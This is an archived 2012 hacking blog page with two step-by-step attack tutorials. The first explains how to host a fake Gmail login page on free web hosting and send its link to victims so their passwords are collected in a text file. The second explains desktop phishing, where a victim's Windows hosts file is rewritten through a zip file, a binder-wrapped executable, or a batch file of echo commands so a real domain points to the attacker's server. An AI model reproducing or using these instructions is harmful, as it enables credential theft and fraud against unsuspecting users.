Google+ ALLHACKD: December 2012

The Art Of Intrusion

Monday, 31 December 2012

Click on image to download E-book
 sorry but these download is held or deleted from server due to copyright contain.



CONTENTS :-


CHAPTERS :-










































Gmail Phishing

 
In my previous article I taught you people how to make a Phishing site. ( The articles is here ). Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)

 





Step 2: Now Go to your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this Gmail FILE . 

Step 4: Now Goto http://members.000webhost.com/ and Log into your account. 





Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered,  







and then Go to  Another File Manager under Files and log into it.






Step 6: Now Click on the Public_HTML.



 Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.(php file, text file, HTML file)




Step 8: Now any one who visits your site would be taken to the Fake Gmail Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected. (send domain name or URL to victim) 

Fake login page


 ========================================================
The Input Data (Email and Password) will look like following:



Email:xyz@abc.com    Password:123456789

if you don't know how to get id and password, follow the steps 5,6
in public folder click on text file.

Desktop Phishing

Friday, 21 December 2012


You may already be familiar with the phishing technique as I have posted some articles over it ( The articles is here ), However still you don’t understood it then I should tell you here again that phishing is such an act where hacker makes a duplicate page I must say login page of any website and in the login fields he makes some changing’s like he embeds a logger script in those login forum fields, thus as a result what you type in those fields is logged and are pasted in a text file on that server where that phishing duplicate page is hosted to fool you. Thus you email and password are sent to hacker as those login fields are for “email address” and “password” ultimately in the end you are redirected to original login page. You should read following posts to understand this in detail:-



In phishing :-


1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2. Victim enters his credentials in fake login page that goes to attacker.
3. Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.


In desktop phishing:-



1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types the domain name of original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.

What is Hosts File?
 The hosts file is a text file containing domain names and IP address associated with them.
Location of hosts files in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com, an query is sent to Domain Name Server (DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

 
What is attack?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We need to modify victim's hosts file by adding the original domain name and IP address of our fake website /phishing page. Whenever victim would visit the original website, he would be directed to our fake login page and domain name in the URL box would remain original as typed by victim. Hence domain name is spoofed.
 
Two Steps to perform attack:-
1. Create and host phishing page on your computer.
2. Modify victim's host file
 
Since the webhosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to fake website like www.anything.110mb.com. An IP address points to a web server and not a website. So we need to host the phishing page on our computer using web server software like wamp or xampp.
Kindly read my simple tutorial on setting up XAMPP web server here  and this step would be clear to you.

Step 2. This step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file. When Zip file would be clicked, it would automatically replace victim's original hosts file with modified hosts file.

Copy your hosts file and paste it anywhere. Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

 
Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.









Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done.

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.



Save file as 'all files' instead of txt files and name it anything.bat. Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

 
Limitations of attack:-
1. Since our public IP address is most probably dynamic that it gets changed every time we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "HTTP" or "HTTPS”. HTTPS is secure.